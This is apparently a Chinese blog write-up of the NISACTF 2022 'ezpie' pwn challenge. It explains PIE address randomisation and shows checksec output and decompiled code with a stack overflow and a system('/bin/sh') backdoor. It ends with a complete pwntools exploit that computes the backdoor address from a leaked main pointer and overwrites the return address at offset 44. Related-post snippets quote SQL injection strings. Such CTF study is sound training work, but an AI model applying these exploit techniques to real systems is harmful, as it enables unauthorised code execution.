pwn旅行之[NISACTF 2022]ezpie

已于 2024-05-03 16:28:05 修改
阅读量693 收藏 7
点赞数 7
分类专栏: Pwn 文章标签: 安全
于 2024-02-25 20:31:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_66013948/article/details/136286903
版权
文章讲述了在NISACTF2022比赛中的一个挑战,涉及PIE保护技术,攻击者需通过观察main函数地址的规律,利用地址偏移找到后门函数,最终实现栈溢出攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[NISACTF 2022]ezpie

PIE保护:

​ PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题。

​ 简单地说就是地址随机化。

绕过方式:

​ 首先拿到这个题目的文件,先检查下文件的保护:

root@g01den-virtual-machine:/mnt/shared# checksec pwn
[*] '/mnt/shared/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

​ 之后反编译看看情况:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  puts("OHHH!,give you a gift!");
  printf("%p\n", main);
  puts("Input:");
  vuln();
  return 0;
}

​ 可以看到,这个题目首先打印出了main函数的地址,所以,可以先试着运行几次程序看看情况:

root@g01den-virtual-machine:/mnt/shared# ./pwn
OHHH!,give you a gift!
0x5664b770
root@g01den-virtual-machine:/mnt/shared# ./pwn
OHHH!,give you a gift!
0x5656b770
root@g01den-virtual-machine:/mnt/shared# ./pwn
OHHH!,give you a gift!
0x56630770

​ 发现这个地址的最后三位数字都是相同的,再来就是根据虚拟内存分页的概念,这个的内存加载的随机化跟动态链接库加载到内存中地址随机化的概念是一样的,都是仅仅只是基地址的随机化,内部的字符之间的偏移是相同的,因此,只要从原文件中知道了偏移地址之后,就可以进行漏洞的利用了。

​ 之后,通过函数的试图,找到了后门函数和危险函数:

ssize_t vuln()
{
  char buf[40]; // [esp+0h] [ebp-28h] BYREF

  return read(0, buf, 0x50u);
}

int shell()
{
  return system("/bin/sh");
}

​ 因此,这个题目的大致思路就是,通过接收输出的main函数的地址,再通过偏移量计算到后门函数的地址,之后,进行栈溢出攻击即可。

​ 计算得到栈的偏移量为44:

root@g01den-virtual-machine:/mnt/shared# cyclic -l 0x6161616c
44

​ 由此,脚本就可以这么写了:

from pwn import *

elf = ELF('./pwn')
io = process('./pwn')

io.recvuntil(b'gift!\n')
main_real = int(io.recv(10),16)
main_add = elf.symbols['main']
shell_add = elf.symbols['shell']
offset = main_add - shell_add
shell_real = main_real - offset
payload = b'A'*44 + p32(shell_real)
io.sendline(payload)
io.interactive()
[NISACTF 2022]
snowlyzz的博客
09-09 6444
NISACTF部分WP
NSSCTF刷题笔记pwn8——[NISACTF 2022]ezpie
qq_45692883的博客
02-02 407
既然泄露了main的真实地址,那么我们通过偏移也能知道shell的真实地址。所谓pie保护啊,就是data、text段载入内存的时候,地址会被随机化。main函数,里面调用了vuln函数,并且泄露出自己main函数的地址。内存中main地址 + 偏移 = 内存中shell的地址。文件中shell地址 - 文件中mian地址 = 偏移。看了一下pwn的保护,开启了pie保护。shell函数,是我们要获取是后门。知道了这些,那么就可以写代码了。vuln很显然是个栈溢出。
PWN · ret2text | PIE 】[NISACTF 2022]ezpie
Mr_Fmnwon的博客
05-31 2473
所接触的PIE保护的第一题,也非常简单。随着刷题的深入,各种保护的开启肯定是免不了的,对此多做总结,总是好的。
NSSCTF [NISACTF 2022]ezpie
最新发布
2401_88087539的博客
02-17 221
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
[NISACTF 2022]ezpie- 入土为安的第十五天
lzx13290757580的博客
08-04 346
​ PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题。这个题目的大致思路就是,通过接收输出的main函数的地址,再通过偏移量计算到后门函数的地址,之后,进行栈溢出攻击即可。运行可以看到确实有70。所以后三位才会保持不变。
[NISACTF 2022]下
qq_62046696的博客
07-30 2872
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
[NISACTF 2022]ezpie 全网最详细
qq_41937545的博客
10-19 1159
我们只需要在接收到70的时候 接收末尾10字节的 整数(这样就可以在 payload当中利用 main函数的地址)思路就是 需要利用这个main函数的地址 多次连接会发现 他的 main函数都是 70结尾的。每一次运行程序的时候 地址都会被随机 所以我们在ida 当中没办法直接看到 地址。现在就需要计算shell到main函数的偏移量(因为我们只知道main的地址)emm 但是nc 的时候他直接给出了 main 函数的真实地址。然后计算一下偏移量(虽然有随机地址的保护 但是偏移量是不变的)
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
PWN要点记录
m0_51246873的博客
09-23 175
PWN 要点
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2407
2022 CISCN 初赛pwn的完整wp
2022ISCC PWN
山高路远
07-05 2362
2022ISCC
CTF-NSSCTF[NISACTF 2022]
2302_78903258的博客
07-27 1264
要匹配的第一个字符与字符串中的第一个进行匹配,如果匹配成功就一直匹配下去,直至匹配不成功就到第二个要匹配的字符,如果第二个匹配的字符成功了就一直匹配下去,如果不成功就吐出原匹配好的字符串最右边的一个字符进行匹配,如果还不成功就继续吐,直至匹配成功才到下一个要匹配的字符,但是我们知道,既然前一个匹配的字符成功了就肯定不符合下一个匹配的字符。由此,当上传的文件名为 /flag ,上传后通过uuid访问文件后,查询到的文件名是 /flag ,那么进行路径拼接时,uploads/ 将被删除,读取到的就是。
[NISACTF 2022]ezpython
weixin_61154173的博客
10-31 947
re简单题
NSSCTF Pwn [NISACTF 2022]ezpie 题解
qq_33348179的博客
02-04 244
因为开启了PIE 所以IDA中 后门函数减去main函数的后三位就是偏移 给出的函数加上这个数就是后门函数地址。下载 exeinfo checksec。发现已经给出了main函数地址。32位 NX PIE开启。
[NISACTF 2022]checkin
qq_40567274的博客
04-08 5062
[NISACTF 2022] 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 提示:以下是本篇文章正文内容,下面案例可供参考 题目-join-us -1' || (select*from aa)# -1'||extractvalue(1,concat(0x5c,(select group_concat(table_name)from information_schema.tables where table_schema like 'sqlsql')))# -1' || extrac
[NISACTF 2022]ezpie已解决
沈理大学牲的博客
10-31 765
PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题。
【[NISACTF 2022]join-us
qq_40567274的博客
04-08 925
[NISACTF 2022] 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录[NISACTF 2022]前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:
[NISACTF 2022]WriteUp web篇
Pysnow's Blog
04-01 5362
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
网鼎杯2022白虎组:逆向、Pwn、Misc与加解密题目解析
2022年白虎组的比赛涵盖了多个网络安全领域的重要知识点,包括逆向工程、二进制漏洞利用(Pwn)、杂项(Misc)和加解密(Crypt)等。以下是相关知识点的详细解读: 逆向工程(Reverse Engineering): 逆向工程在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值